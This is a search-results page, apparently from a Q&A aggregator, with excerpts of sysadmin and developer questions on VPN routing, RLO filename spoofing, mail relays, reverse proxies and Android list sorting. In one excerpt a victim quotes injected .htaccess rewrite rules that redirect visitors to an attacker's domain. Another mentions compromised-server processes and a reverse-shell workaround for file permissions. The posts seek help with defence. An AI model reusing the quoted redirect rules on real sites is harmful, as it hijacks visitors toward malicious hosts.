Search Results

Search found 2327 results on 94 pages for 'reverse geocoding'.

Page 76/94 | < Previous Page | 72 73 74 75 76 77 78 79 80 81 82 83  | Next Page >

• Have servers behind OpenVPN subnet reach connecting clients

  - by imaginative

  I am trying to find some relevant documentation or what directives I need in either the OpenVPN server configuration or client configuration to accommodate for this use case. I have an OpenVPN server that clients connect to. The OpenVPN server can communicate directly with any of the clients already, this is not an issue. The client is able to reach any machine on the private subnet where OpenVPN resides, this is also not an issue. My issue is that the reverse is currently not possible - I have servers on the same subnet as the OpenVPN box that cannot reach any of the connecting clients. I'd like to be able to SSH to them and more, the same way the client can reach the servers behind the OpenVPN subnet. What do I need to do to make this possible? I already have masquerading rules set on the OpenVPN box: iptables -t nat -A POSTROUTING -s 192.168.50.0/24 -o eth0 -j MASQUERADE IP Forwarding is enabled: echo 1 >/proc/sys/net/ipv4/ip_forward I added a route on the server behind the private subnet to be aware of the route: 192.168.50.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 What am I missing?

  Read the article

• What are ways to prevent files with the Right-to-Left Override Unicode character in their name (a malware spoofing method) from being written or read?

  - by galacticninja

  What are ways to avoid or prevent files with the RLO (Right-to-Left Override) Unicode character in their name (a malware method to spoof filenames) from being written or read in a Windows PC? More info on the RLO unicode character here: http://www.fileformat.info/info/unicode/char/202e/index.htm http://en.wikipedia.org/wiki/Bi-directional_text Info on the RLO unicode character when used by malware: http://www.ipa.jp/security/english/virus/press/201110/E_PR201110.html Mirror link: http://webcache.googleusercontent.com/search?q=cache:KasmfOvbVJ8J:www.ipa.jp/security/english/virus/press/201110/E_PR201110.html+&cd=1&hl=en&ct=clnk You can try this RLO character test webpage: http://www.fileformat.info/info/unicode/char/202e/browsertest.htm The RLO character is also already pasted in the 'Input Test' field in that webpage. Try typing there and notice that the characters you're typing are coming out in their reverse orders (right-to-left, instead of left-to-right). In filenames, the RLO character can be specifically positioned in the filename to spoof or masquerade as having a filename or file extension that is different than what it actually has. (Will still be hidden even if 'Hide extensions for known filetypes' is unchecked.) The only info I can find that has info on how to prevent files with the RLO character from being run is from the Information Technology Promotion Agency, Japan website: http://www.ipa.jp/security/english/virus/press/201110/E_PR201110.html (Mirror link). They adviced to use the Local Security Policy settings manager to block files with the RLO character in its name from being run. Can anyone recommend any other good solutions to prevent files with the RLO character in their names from being written or being read in the computer, or a way to alert the user if a file with the RLO character is detected? My OS is Windows 7, but I'll be looking for solutions for Windows XP, Vista and 7, or a solution that will work for all those OSes, to help people using those OSes too.

  Read the article

• Change to different user, or let different user execute a command

  - by WG-

  I have a problem. There is a server which I can access with an account by ssh, lets say WG. Now there is a folder with the following permissions. drwxr-s---+ 855 vvz www-data 20K Aug 21 17:56 pictures I want to copy this folder using rsync, however since I am not the user www-data but WG I cannot execute rsync. So I want www-data to execute a rsync command. However, I do not posses sudo powers. My friend however tells me that I am actually able to execute the rsync command as www-data, but he will not tell me how. I asked him for some clues and he told me that it had something to do with reverse shell (which I figured out to be that you connect by ssh to your server and then you connect back to your own server, or something). I also asked if it was by-design or actually a flaw in the system. He tells me it is both. Furthermore I think it has something to do with the group permissions. If I just make sure that I am with the group permissions then I can also read the files. Anybody has a clue?

  Read the article

• How do I encapsulate the application server from the web and database servers?

  - by SNyamathi

  So I've been doing some reading and it seems like the best practice would be to have separate database, application, and web servers. There are a few things that I've failed to understand - please feel free to recommend any reading materials that would address these topics. Database (assume MySQL) Application server communication: Does the database server do any sort of checks on the SQL commands sent / returned, or is it just a "dumb pipe" that responds to SQL commands by spitting back data? Application server (assume Tomcat) Web Server Almost the reverse here, is it the web server that is more of a pipe to the internet that forwards requests to the application server and spits back responses? I'm not wording this well, but I'm trying to ask - is it the application server that is responsible for validating data received by from requests? ex: Parsing POSTs Validating user logins Encrypting decrypting data Furthermore, how do these two servers communicate? I'm trying to keep things as flexible as possible here, so while I could write a web server in Java and use Java to communicate between the web and app server, that doesn't sound very modular. What if I want to use Python or some other language to replace the web server later on? What if I want to make a non-web facing application used in house written in C++ or something.

  Read the article

• Finding Webserver Vulnerability

  - by Brent

  We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so apache or it's plugins are likely the culprit all the changes were made within 15 minutes of each other, so it was probably automated since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site) if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse) Any more hints would be appreciated.

  Read the article

• What switch should we use for PCoIP?

  - by Jay R.

  We have a small lab space that seats 10 people and has 20 machines. Each machine is set to 1920x1200 resolution because the user apps are best used at that resolution. Currently the machines are all located close enough to montors that a DisplayPort cable will reach, but the pending lab remodel positions them around 80 feet or more away in racks. Our proposed solution is to use PCoIP. We purchased 10 PCoIP portals and 20 PCoIP host cards. We plan to set up a dedicated network to handle just the PCoIP traffic. After testing just one portal and one host card with a cheap 1G switch from a local office supply store, we were left with less than good impressions about the usefulness in our lab. The framerates were not spectacular and the mouse seemed jerky. Our concern is that we can't get away with the cheap 1G stuff from the store because adding more machines to the switch will just make the user experience worse. What switch would be recommended to best support our PCoIP situation? We will need to plug in at least 30 cables based on just those machines. Is there a particular feature to search for that makes a difference? Is there a switch that works best with PCoIP? Added Info: The reporting webapp for the host card shows maximum bandwidth usage to be 220000 kbps. The average appears to be around 180000 kbps. The reverse direction is much lower, like 15000 kbps.

  Read the article

• backup an existing linux server to a virtualbox virtual machine

  - by user146526

  I have some servers and VPSs to many companies across the world. I want to back them up locally. I have some backup solutions enabled to remote hosts, but I want to have a local backup on a computer at home. What I am thinking is: 1) Create a virtualbox virtual machine, install the same version linux as the server. 2) Use rsync to backup the server to the local virtualbox machine. (something like rsync -av --delete --progress --exclude '/dev/' --exclude '/proc/' root@server_ip:// / ) 3) Repeat the command every few days update files. 4) In case of a hard disk failure, or any other bad event, reverse the rsync command and get the files back and continue my bussiness. I tried it with 2 openvz VPS, the one was a backup of the other. I also tried to transfer normal linux server host to openvz machine and it worked great. That way looks pretty clean and easy to me, this is the kind of solution I am looking for. However I need to be sure that this will work if I am going to do it. The question is, will that work ok ? Does anyone see any problem with that ? Do you have any other suggestions ? Thanks

  Read the article

• Mail Server using Postfix

  - by unknown (google)

  I have currently set up my web application on Amazon EC2 server. As a well known fact sending email from EC2 has a problem. As a cheap and long lasting solution instead of using "authsmtp" is it possible to rent a server and use it as a Mail Server? I am currently looking for cheap hosting which will give me root access so that it can be configured and used as a relayhost. I am curently using Postfix as MTA. Has any one implemented this before? I am curious about its feasibility of this solution. I guess common requirements are: 1: Dedicated IP which is not black listed. 2: Open relay( open to my Server only) Any Tips for Header configurations to keep the mails out of spam folder. This is like exactly cloning authsmtp for personal use. Any suggestions for other Mail Server software instead of Postfix? Another problem is Reverse DNS for this server. Should PTR entry be present if a server is used as a relayhost?

  Read the article

• Determine from where is "sh" being run under apache www-data user using using PF or NETSTAT

  - by Eugene van der Merwe

  I am working with a compromised Ubuntu 8.04 Plesk 9.5.4 server. It seems that a script on the server is continuously doing reverse lookups to random IPs on the Internet. I first spotted it during by using top and then noticed flashes of this coming up continuously: sh -c host -W 1 '198.204.241.10' I wrote a this script to interrogate ps every 1 second to see how frequently this script happens: #!/bin/bash while : do ps -ef | egrep -i "sh -c host" sleep 1 done The results are that this script runs often, every few seconds: www-data 17762 8332 1 10:07 ? 00:00:00 sh -c host -W 1 '59.58.139.134' www-data 17772 8332 1 10:07 ? 00:00:00 sh -c host -W 1 '59.58.139.134' www-data 17879 17869 0 10:07 ? 00:00:00 sh -c host -W 1 '198.204.241.10' www-data 17879 17869 1 10:07 ? 00:00:00 sh -c host -W 1 '198.204.241.10' www-data 17879 17869 0 10:07 ? 00:00:00 sh -c host -W 1 '198.204.241.10' root 18031 17756 0 10:07 pts/2 00:00:00 egrep -i sh -c host www-data 18078 16704 0 10:07 ? 00:00:00 sh -c host -W 1 '59.58.139.134' www-data 18125 17996 0 10:07 ? 00:00:00 sh -c host -W 1 '91.124.51.65' root 18131 17756 0 10:07 pts/2 00:00:00 egrep -i sh -c host www-data 18137 17869 0 10:07 ? 00:00:00 sh -c host -W 1 '198.204.241.10' www-data 18137 17869 1 10:07 ? 00:00:00 sh -c host -W 1 '198.204.241.10' My theory is if I can see who is launching the sh process or form where it's launched I can isolate the problem further. Can somebody please guide me using netstat or ps to identify from where sh is being run? I might get many suggestions that the OS is out of date and so the Plesk, but please bear in mind there are some very concrete reasons why this server is running legacy software. My question is aimed at a advanced Linux systems administrators who have in depth experience with security compromises and using netstat and ps to get to the bottom of it.

  Read the article

• Puppet: is it ok to "force" certname when you expect to shuffle nodes around?

  - by Luke404

  We all know (good example on SF) that Puppet hostname detection could be... fun. At our company (and I guess we're not alone at this) we usually pre-configure servers at our offices and test them before bringing the gear to a remote datacenter and rack them. Of course the reverse dns will change when doing that, even if we don't change the actual hostname of the system. We're slowly drafting our puppet setup and I'd like to be sure those moves won't create problems. My idea is to explicitly configure the desired full FQDN of the system as certname in puppet.conf at server provision time (before the very first puppet run). My process would look something like this: basic o.s. installation basic network configuration, enough to reach the internet and resolve dns install puppet and set up certname start puppet and let him manage the whole configuration test, fix problems in config (via puppet), re-test, and so on... manually stop puppet set up new network configuration for the datacenter network move the machine to DC turn it on puppet should automatically start and keep on doing its job The process is supported by detecting the environment in puppet's manifests (eg. based on subnet, like they do at Wikimedia) and modify configuration as needed (eg. resolv.conf contents appropriate for each network). Each node's certname will never change for the whole system life cycle. Is there any problem with this approach? Could it be improved?

  Read the article

• ASA access lists and Egress Filtering

  - by Nate

  Hello. I'm trying to learn how to use a cisco ASA firewall, and I don't really know what I'm doing. I'm trying to set up some egress filtering, with the goal of allowing only the minimal amount of traffic out of the network, even if it originated from within the inside interface. In other words, I'm trying to set up dmz_in and inside_in ACLs as if the inside interface is not too trustworthy. I haven't fully grasped all the concepts yet, so I have a few issues. Assume that we're working with three interfaces: inside, outside, and DMZ. Let's say I have a server (X.Y.Z.1) that has to respond to PING, HTTP, SSH, FTP, MySQL, and SMTP. My ACL looks something like this: access-list outside_in extended permit icmp any host X.Y.Z.1 echo-reply access-list outside_in extended permit tcp any host X.Y.Z.1 eq www access-list outside_in extended permit tcp any host X.Y.Z.1 eq ssh access-list outside_in extended permit tcp any host X.Y.Z.1 eq ftp access-list outside_in extended permit tcp any host X.Y.Z.1 eq ftp-data established access-list outside_in extended permit tcp any host X.Y.Z.1 eq 3306 access-list outside_in extended permit tcp any host X.Y.Z.1 eq smtp and I apply it like this: access-group outside_in in interface outside My question is, what can I do for egress filtering? I want to only allow the minimal amount of traffic out. Do I just "reverse" the rules (i.e. the smtp rule becomes access-list inside_out extended permit tcp host X.Y.Z.1 any eq smtp ) and call it a day, or can I further cull my options? What can I safely block? Furthermore, when doing egress filtering, is it enough to apply "inverted" rules to the outside interface, or should I also look into making dmz_in and inside_in acls? I've heard the term "egress filtering" thrown around a lot, but I don't really know what I'm doing. Any pointers towards good resources and reading would also be helpful, most of the ones I've found presume that I know a lot more than I do.

  Read the article

• SSH hangs when executing command remotely

  - by Serty Oan

  Client : OpenSSH_5.1p1 Debian-5ubuntu1 (Ubuntu 9.04) Server : OpenSSH_5.1p1 Debian-5 (Proxmox 2.6.24-7-pve) I use SSH to execute commands remotely on the server (module check_by_ssh of Nagios). But SSH hangs from time to time when trying to execute commands. I can log to the server via SSH but not executing a simple 'ls'. And it seems to block from all clients from the same IP address. Authentication is not the problem, may it be made by SSH keys or password. ssh -l root -p 2222 server.domain.tld 'ls' Here the client debug info debug1: Entering interactive session. debug2: callback start debug2: client_session2_setup: id 0 debug1: Sending environment. debug3: Ignored env ORBIT_SOCKETDIR *** skipping approx 40 env var ignored debug1: Sending command: ls debug2: channel 0: request exec confirm 1 It hangs there. Then after a random time, it works again (without doing anything). Killing all sshd process on the server seems to work too. It works from a Putty. I saw that some people had trouble like this due to ISP reverse DNS problem, but it does not seem to be the case here. It can work for hours and then not work for half an hour or so. What could explain this behaviour ?

  Read the article

• Proxypass issue in apache

  - by user116992

  I am reverse proxying one site to another site. It's working nicely, but on some links it displays the original link. Here is my configuration Original Site "mysite.com" Second site configuration which is proxypassed on "mysite.com" <VirtualHost *:80> ServerName test.mysite.com ServerAlias www.test.mysite.com test.mysite.com ErrorLog /var/log/apache2/test.mysite_log.log TransferLog /var/log/apache2/test.mysite-access_log.log LogLevel info LogFormat "%h %l %u %t \"%r\" %>s %b %T" common ProxyPass / http://mysite.com/ ProxyPass / http://mysite.com/ ProxyPassReverse / http://mysite.com/ </VirtualHost> Now, everything is working well, but the problem is that when I go to some specific link it redirects me to original link. For Example, there are two sections on my page: "about-us" and "inquiry". When I click on "about-us" it takes me to "http://test.mysite.com/about-us" which is ok When I click on "inquiry" it takes me to "http://mysite.com/inquiry" which is not correct it must be "http://test.mysite.com/inquiry". I think I've missed some thing to add in configuration file but I can't figure it out.

  Read the article

• How do i Setup a Mac OS X Server - NameServer behind an Airport Extreme?

  - by basilmir

  I have a Mac mini server i want to setup to host a couple of things. My setup is as follows: The WAN connection (static IP and ISP nameservers) goes into the wan port of the Airport Extreme. The Mac mini server is connected to one of the ethernet ports. The mac mini will host my domain something.com. My settings so far: Airport Express gets: 96.x.x.x as the external static IP from the ISP 174.y.y.y as the nameserver Mac mini server always gets a reserved DHCP IP from the Airport Express: 10.0.1.3 is the server's ip 10.0.1.1 as the dns (this ip is the airport express itself) My dns server has an A record pointing to ns.something.com and a PTR doing the reverse. I've already added my 96.x.x.x to point ns.something.com with my registrar as attached. NOW: Nobody seems to be able to access my ns.something.com to resolve any of my records. From a any computer in my network I CAN see my ns and everything works. The outside on the other hand does not... it's as if the airport extreme which "holds" the exterior 94.x.x.x address doesn't pass DNS along to my 10.0.1.3 ns server. I have the server managing the airport. Isn't this supposed to work?

  Read the article

• Apache Virtualhost entry with Windows hostname

  - by gshauger

  I have a Windows Domain Controller and we use it for DNS for our internal network. I have an Ubuntu box with an IP address of 172.16.34.149. Within the Windows DNS I created the forward and reverse lookup entries for the name Endymion. Naturally when ever I FTP/SSH/HTTP/etc to the hostname Endymion it resolves correctly to my Ubuntu box. I wanted to do some web development on this box for an existing site. There were problems when I placed the website in a subfolder of /var/www/. Let's just say it was in folder /var/www/projectx/. The issue involved the incorrect resolution of non-relative urls. So I figure I could create a new DNS entry for the hostname projectx. Sure enough when I FTP/SSH/HTTP/etc to the hostname projectx it takes me to the same ubuntu box as the hostname Endymion...this is what I would expect. I now have two hostnames for the same box. I then create a Virtualhost entry in httpd.conf that looks like the following: <VirtualHost *:80> DocumentRoot /var/www/projectx ServerName projectx ServerAlias projectx </VirtualHost> Sure enough when I go to a browser and type in http://projectx/ it takes me to the correct subfolder. Everything works!!! Not so fast. I then go to http://endymion/ and instead of taking me to /var/www/ it takes me to /var/www/projectx/ Clearly I'm missing something. Help please! ;)

  Read the article

• How to set up a server without a hosting control panel

  - by A4J

  I have always used a control panel on my dedicated servers - from cPanel to Plesk to Virtualmin, and I am now considering ditching a CP altogether and manually editing config files. My requirements are fairly simple, I will host multiple sites on the server; some Apache with PHP & Mysql and some Passenger with Rails & Postgres. All will require email smtp/pop. FTP/Stats will not be required. Could someone please give me a quick run-down of what I would need to do - in terms of installing software and configuration? My server will come with a base install of CentOS 6.4 minimal. My thoughts so far: Install/update latest versions of MySQL & Postgres (are they 'safe' out of the box? Or do I need to do anything else like set up root passwords etc?) Install Apache & PHP (again, are the base installs good to go or do they require security tweaks?) Set up nameservers/hostnames/reverse DNS etc (Any guides on how to do this please?) Install Rubygems Install and configure Dovecot and Postfix (any tips on doing this? Or links to how-tos that cover it please?) Set up each website - any links to guides on how to do this? Install/configure firewall (or is the default install good to go?) Any other tips or advice would be greatly appreciated, as would links to guides or how-tos.

  Read the article

• mod_rewrite with AJAX applictions: possible?

  - by MrJackV

  I am trying to run Shell In a Box (link) through another server (the computer running shellinabox is not accessible from the internet) . Ideally I could use ProxyPass in the Apache config to have a reverse proxy. Problem is I can't access the conf file. So I tried using .htaccess and I discover that I cannot use ProxyPass in there. So I tried and used mod_rewrite to do the job. Currently I have the following on the .htaccess file RewriteEngine On RewriteRule ^$ http://10.1.13.236:4200/ [P] However while it displays the title correctly and if I open up the source code I can see there is something in the page, nothing is diplayed on the screen (it remains blank). My suspicion is that there are problems with AJAX and this kind of proxy. What I am trying to accomplish with the mod_rewrite as close as possible behaviour to ProxyPass (Mirorr a website in a subdirectory). Is this possible? Is there some other solution (I tried phproxy and khproxy but neither of them is able to display anything)? Thanks in advance

  Read the article

• Duplicate forwarded messages in Blackberry when using BIS

  - by Avery Payne

  Our Setup External email arrives at a Postfix server, is scanned, and then forwarded via settings in transport (using the RELAY:[{ip-address}] for a given address) to an Exchange 2007 server. Some users are on Exchange, but a few are still on the Postfix server (they will be moved in the near future). IMAPS is provided for external connections via Dovecot; in-house, IMAP is provided for the Gateway and native MAPI is used for Exchange/Outlook. Blackberries are connected via BIS, which uses Dovecot as a reverse-proxy IMAPS service to connect to Exchange (when the mailbox exists on Exchange, otherwise it connects to the mailbox on the gateway). The Issue We have a user that, when they forward an email on their Outlook client, they get a duplicate of the original message on their Blackberry. When I say duplicate, I mean that they have a copy of the forwarded version of the message (i.e. their version of the message that they obtained hitting the forward button), and a copy of the original message that shows up at the same time. The expected behavior is to just see the forwarded message, not the forwarded message and a 2nd copy of the original message. We've only seen this with Outlook users that also have a Blackberry. Other IMAP clients, such as OS X Mail or Thunderbird, do not exhibit this behavior when connecting to the Exchange server; forwarded messages work as expected. The Questions what is causing this to happen? why does it only affect Outlook/Blackberry setups, and not TBird/Blackberry or OSX-Mail/Blackberry? how do we get it to stop, before people go insane and never forward messages again?

  Read the article

• How is it possible to list all folders that a particular user/group has permissions on?

  - by Lord Torgamus

  Is it possible to list all folders/files that a given group has explicit permissions on, for a machine running Windows Server 2003? If so, how? It would be nice to see inherited permissions as well, but I could do with just explicit permissions. A little background: I'm trying to update groups/permissions on a test server. One of the groups, Devs, wasn't implemented correctly when it was created, and my goal is to remove it from the system. It has been replaced by LeadDevelopers, which has permissions on many — but naturally not all — of the same folders. I want to make sure that I don't accidentally orphan any folders or cause any other issues when I remove Devs. It did have some admin-level permissions. EDIT: The answers so far — at least *cacls and AccessEnum — provide a way to find out which groups/users have permissions on known directories/files. I actually want the reverse of this behavior: I know the group, and I'm looking for the directories/files for which the group has permissions. Also, as I noted in a comment, the Devs group is not itself a member of any other group.

  Read the article

• Redirect without changing URL

  - by Coobadivin

  Here's the setup. We have a hardware load balancer with an http virtual cluster. Let's call this virtual cluster example1.com. This virtual cluster load balances between two squid reverse proxies which are also on the same physical servers as the web servers. Squid listens on 80 and points to itself as the cache_peer web server which listens on 81. We also have a standalone web server which we will call example2.com. What we are trying to do is create a subdirectory on example1.com called example1.com/example2. This will point to example2.com, but we want our users to stay at example1.com/example2 in their browser. So, it's like a redirect without actually being a redirect. How the hell do I go about doing this? Is this even possible? I'm looking at squid docs in the meantime. example1.com is running a proprietary web server - not Apache :( We can't host example2.com's content in example1.com's file system. These are two very different platforms.

  Read the article

• A duplicate name has been detected on the TCP network

  - by MSedm

  When I installed my domain controller and DNS, I had 2 NIC on the server. Both NIC has its own IP address. NICs are not teamed, they are seperate and ip address are in the same subnet. Both IP address are now registered in the DNS. i found them in Forward and reverse lookup zone. Everything working ok except the following error in the event log. "A duplicate name has been detected on the TCP network......" Now I have realized that this is because of the second NIC. My question is if i disable the second NIC, what happen to those DNS record assiciated with the second ip address? How do I remove all the DNS recored for the disabled NIC? There are A record, some record with the name (same as parent folder), PTR record and may be more. How do i disable second NIC and remove all the associated DNS recoreds? Please help.

  Read the article

• very slow connection to ssh server from client (but not other servers)

  - by AntonOfTheWoods

  I have an Ubuntu 12.04 laptop that is taking so long to connect to various servers (in different data centres) that it seems like a bit of a lottery whether I'll actually get a connection. If I connect to the servers between themselves it's instantaneous, and I've set UseDNS no AddressFamily inet On the servers I'm connecting to (and rebooted for good measure). I also put in the reverse DNS+IP of the cable connection I'm connecting from. If I connect from the laptop via telnet: telnet my.server 22 Then the connection is also instantaneous, so it doesn't appear to be a problem with an intervening firewall. I have the same behaviour whether I connect with the IP, a short name in my hosts or the FQDN. I'm connecting with a 50mbps (cable, sync) connection so that doesn't appear to be the problem, and when I do finally get a connection then it's a good, quick, stable one. I have tried listening on another port (8000) and that makes no difference. Web and other connections from the laptop to the machine are also very good. Does anyone have any ideas here?

  Read the article

• Strategy to isolate multiple nginx ssl apps with single domain via suburi's?

  - by icpu

  Warning: so far I have only learnt how to use nginx to serve apps with their own domain and server block. But I think its time to dive a little deeper. To mitigate the need for multiple SSL certificates or expensive wildcard certificates I would like to serve multiple apps (e.g. rails apps, php apps, node.js apps) from one nginx server_name. e.g. rooturl/railsapp rooturl/nodejsapp rooturl/phpshop rooturl/phpblog I am unsure on ideal strategy. Some examples I have seen and or thought about: Multiple location rules, this seems to cause conflicts between the individual app config requirements, e.g. differing rewrite and access requirements Isolated apps by backend internal port, is this possible? Each port routing to its own config? So config is isolated and can be bespoke to app requirements. Reverse proxy, I am little ignorant of how this works, is this what I need to research? is this actually 2 above? Help online seems to always proxy to another server e.g apache What is an effective way to isolate config requirements for apps served from a single domain via sub uris?

  Read the article

• How can I document and automate a system's configuration?

  - by Diomidis Spinellis

  Having a system's configuration represented by its current state is risky, inefficient, and opaque. At some point you may be left with an unsupported system and no upgrade path. Then configuring a new system compatible with the old is a process or trial and error. Furthermore, if at some point the system is damaged the only option is to go back to the most recent full backup, and try to remember what changes followed from that point. Also, the only way to create a system compatible with the original is through a complete dump/restore. Finally, in such a setup there's no way to know how you solved a particular problem; the only thing you can do is to look at the corresponding configuration files and try to guess what you changed to achieve the desired effect. Currently for each system I maintain, I keep a log file where I record all system administration activity, starting from the installation: installation options, added packages, changes in configuration files, updates, problem fixes etc. In theory this allows me to (manually) replay all changes to arrive at the current state, or to unroll an erroneous change by executing the reverse commands. However, this process is also inefficient, error-prone, and relies on human judgment. Another thing I've tried is to put /etc configuration files under version control with git. This helps me document the changes automatically and also apply them on a clean setup. But it's not without problems: git has to run under sudo, passwords and private keys may be stored in the repository, installed packages can't be meaningfully tracked, and git will have a fit if I try to extend this approach to all the system's directories. I've also thought about performing all changes through shell scripts or makefiles, but I think this process will require a lot of effort and will be fragile. Are there some better methods or tools that I'm missing?

  Read the article

• How to sort & Group in Android?

  - by crickpatel0024

  I have ArrayList and I want to sort and group all data by header in Android. How it is possible in Android? please help me.below me from owner And set header Me And Joe Manager From owner And set Header in listview. How to do that in Android? My code in below:: public class Request extends Activity { private String assosiatetoken; private ArrayList<All_Request_data_dto> list = new ArrayList<All_Request_data_dto>(); ListView lv; Button back; private Spinner spndata; String[] reqspinner = { "Request Date", "Last Update", "Type", "Owner", "State" }; ArrayAdapter<String> adapter; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.request); assosiatetoken = MyApplication.getToken(); new doinbackground(this).execute(); back = (Button) findViewById(R.id.button1); spndata = (Spinner) findViewById(R.id.list_all_quize_req); adapter = new ArrayAdapter<String>(this, android.R.layout.simple_spinner_item, reqspinner); spndata.setAdapter(adapter); lv = (ListView) findViewById(R.id.listrequestdata); lv.setOnItemClickListener(new OnItemClickListener() { public void onItemClick(AdapterView<?> a, View v, int position, long id) { Intent edit = new Intent(Request.this, Request_webview.class); // edit.putExtra("Cat_url", url_link); startActivity(edit); } }); spndata.setOnItemSelectedListener(new OnItemSelectedListener() { public void onItemSelected(AdapterView<?> arg0, View arg1, int position, long arg3) { switch (position) { case 0: list = DBAdpter.requestUserData(assosiatetoken); Collections.sort(list, byDate1); // Collections.reverse(list); for (int i = 0; i < list.size(); i++) { if (list.get(i).submitDate != null) { lv.setAdapter(new MyListAdapter( getApplicationContext(), list)); } } break; case 1: list = DBAdpter.requestUserData(assosiatetoken); Collections.sort(list, byDate); for (int i = 0; i < list.size(); i++) { if (list.get(i).lastModifiedDate != null) { lv.setAdapter(new MyListAdapter( getApplicationContext(), list)); } } break; case 2: list = DBAdpter.requestUserData(assosiatetoken); Collections.sort(list, byDate3); // Collections.reverse(list); for (int i = 0; i < list.size(); i++) { if (list.get(i).state != null) { lv.setAdapter(new MyListAdapter( getApplicationContext(), list)); } } break; case 3: list = DBAdpter.requestUserData(assosiatetoken); for (int i = 0; i < list.size(); i++) { lv.setAdapter(new MyListAdapter( getApplicationContext(), list)); } break; default: break; } } public void onNothingSelected(AdapterView<?> arg0) { } }); back.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { finish(); } }); } static final Comparator<All_Request_data_dto> byDate = new Comparator<All_Request_data_dto>() { SimpleDateFormat sdf = new SimpleDateFormat("MM/dd/yyyy hh:mm:ss a"); public int compare(All_Request_data_dto ord1, All_Request_data_dto ord2) { java.util.Date d1 = null; java.util.Date d2 = null; try { d1 = sdf.parse(ord1.lastModifiedDate); d2 = sdf.parse(ord2.lastModifiedDate); } catch (java.text.ParseException e) { // TODO Auto-generated catch block e.printStackTrace(); } return (d1.getTime() > d2.getTime() ? -1 : 1); // descending // return (d1.getTime() > d2.getTime() ? 1 : -1); //ascending } }; static final Comparator<All_Request_data_dto> byDate1 = new Comparator<All_Request_data_dto>() { SimpleDateFormat sdf = new SimpleDateFormat("MM/dd/yyyy hh:mm:ss a"); public int compare(All_Request_data_dto ord1, All_Request_data_dto ord2) { java.util.Date d1 = null; java.util.Date d2 = null; try { d1 = sdf.parse(ord1.submitDate); d2 = sdf.parse(ord2.submitDate); } catch (java.text.ParseException e) { // TODO Auto-generated catch block e.printStackTrace(); } return (d1.getTime() > d2.getTime() ? -1 : 1); // descending // return (d1.getTime() > d2.getTime() ? 1 : -1); //ascending } }; static final Comparator<All_Request_data_dto> byDate3 = new Comparator<All_Request_data_dto>() { public int compare(All_Request_data_dto ord1, All_Request_data_dto ord2) { String d1 = null; String d2 = null; d1 = ord1.state; d2 = ord2.state; return d1.compareToIgnoreCase(d2); } }; class doinbackground extends AsyncTask<Void, Void, Void> { ProgressDialog pd; private Context ctx; public doinbackground(Context c) { ctx = c; } @Override protected void onPreExecute() { super.onPreExecute(); pd = new ProgressDialog(ctx); pd.setMessage("Loading..."); pd.show(); } @Override protected Void doInBackground(Void... Params) { return null; } @Override protected void onPostExecute(Void result) { super.onPostExecute(result); pd.cancel(); } } public class MyListAdapter extends BaseAdapter { private ArrayList<All_Request_data_dto> list; public MyListAdapter(Context mContext, ArrayList<All_Request_data_dto> list) { this.list = list; } public int getCount() { return list.size(); } public All_Request_data_dto getItem(int position) { return list.get(position); } public long getItemId(int position) { return position; } public View getView(int position, View convertView, ViewGroup parent) { // if (convertView == null) { LayoutInflater inflator = (LayoutInflater) getSystemService(LAYOUT_INFLATER_SERVICE); convertView = inflator.inflate(R.layout.custom_request_data, null); TextView req_id = (TextView) convertView.findViewById(R.id.req_txt); TextView date = (TextView) convertView.findViewById(R.id.date_txt); TextView owner = (TextView) convertView .findViewById(R.id.owner_txt); TextView state = (TextView) convertView .findViewById(R.id.state_txt); req_id.setText(list.get(position).requestId + " - " + list.get(position).title); date.setText(list.get(position).lastModifiedDate + " - " + list.get(position).submitDate); owner.setText(list.get(position).owner); state.setText(list.get(position).state); // } return convertView; } } }

  Read the article

< Previous Page | 72 73 74 75 76 77 78 79 80 81 82 83  | Next Page >